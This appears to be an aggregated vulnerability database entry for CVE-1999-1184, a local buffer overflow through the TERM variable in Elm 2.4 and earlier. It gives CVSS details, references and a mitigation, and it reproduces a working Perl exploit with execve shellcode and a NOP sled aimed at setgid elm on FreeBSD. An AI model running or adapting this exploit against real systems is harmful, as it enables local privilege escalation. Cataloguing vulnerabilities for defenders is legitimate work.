CVE-1999-1184
CVSS 4.6
Published: 1997-05-13 00:00:00
Revised: 2016-10-17 22:02:00
NMCOE

[Original] Buffer overflow in Elm 2.4 and earlier allows local users to gain privileges via a long TERM environmental variable.


[CNNVD] Elm buffer overflow vulnerability (CNNVD-199705-012)

        Elm 2.4 and earlier versions contain a buffer overflow vulnerability. A local user can gain privileges via an overly long environment variable.

- CVSS (base score)

CVSS score: 4.6 [medium (MEDIUM)]
Confidentiality impact: PARTIAL [likely to cause information disclosure]
Integrity impact: PARTIAL [may allow system files to be modified]
Availability impact: PARTIAL [may degrade performance or interrupt access to resources]
Attack complexity: LOW [exploitation has no access restrictions]
Attack vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

cpe:/a:elm_development_group:elm:2.4
cpe:/a:elm_development_group:elm:2.3

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1184
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-1184
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199705-012
(official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=87602167420967&w=2
(UNKNOWN)  BUGTRAQ  19970513
http://marc.info/?l=bugtraq&m=87602167420970&w=2
(UNKNOWN)  BUGTRAQ  19970514 Re: ELM overflow

- Vulnerability information

Elm buffer overflow vulnerability
Medium severity  Buffer overflow
1997-05-13 00:00:00 2005-10-20 00:00:00
Local
        Elm 2.4 and earlier versions contain a buffer overflow vulnerability. A local user can gain privileges via an overly long environment variable.

- Advisories and patches


- Vulnerability information (22836)

Elm 2.3/2.4 Local TERM Environment Variable Buffer Overrun Vulnerability (EDBID:22836)
linux local
1997-05-13 Verified
0 kokanin
N/A
source: http://www.securityfocus.com/bid/8030/info

A buffer overrun has been discovered in Elm. The problem occurs due to insufficient bounds checking performed before copying user-supplied data into an internal memory buffer. Specifically, a TERM environment variable containing excessive data would cause a buffer within Elm to be overrun.

As Elm is installed setgid on some systems, the exploitation of this vulnerability could potentially allow for the elevation of local privileges.

# DSR-korean-elm.pl - kokaninATdtors.net vs. /usr/ports/korean/elm
# offset, retaddr and shellcode is for my FreeBSD 4.7-RELEASE, YMMV
# reinventing the wheel, http://www.insecure.org/sploits/elm.curses.overflow.html
# shellcode by zillionATsafemode.org
# ko-elm-2.4h4.1      ELM Mail User Agent, patched for Korean E-Mail
# elm is setgid 'bin' 

$len = 512;
$ret = 0xbfbffd68;
$nop = "\x90";
$offset = 0;
$shellcode = "\x31\xc0\x50\x50\xb0\x17\xcd\x80\x31\xc0\x50\x68".
             "\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50".
             "\x54\x53\x50\xb0\x3b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";

if (@ARGV == 1) {
    $offset = $ARGV[0];
}

for ($i = 0; $i < ($len - length($shellcode)); $i++) {
    $buffer .= $nop;
}
$buffer .= $shellcode;
$new_ret = pack('l', ($ret + $offset));
local($ENV{'EGG'}) = $buffer;
local($ENV{'TERM'}) = $new_ret x 12;
exec("elm");

- Vulnerability information

2198
FreeBSD Korean Elm Port Local Overflow
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

A flaw in the Korean port of Elm 2.4h4.1 on FreeBSD allows a malicious local user to overflow the buffer and gain access to the system as the bin user. This flaw occurs because the software does not handle certain environment variables correctly.

- Timeline

2003-06-23 2003-06-23
2003-06-23 Unknown

- Solution

Limit access to system to trusted users only or remove Elm and use another mail application.

- Related references

- Vulnerability author

Unknown or Incomplete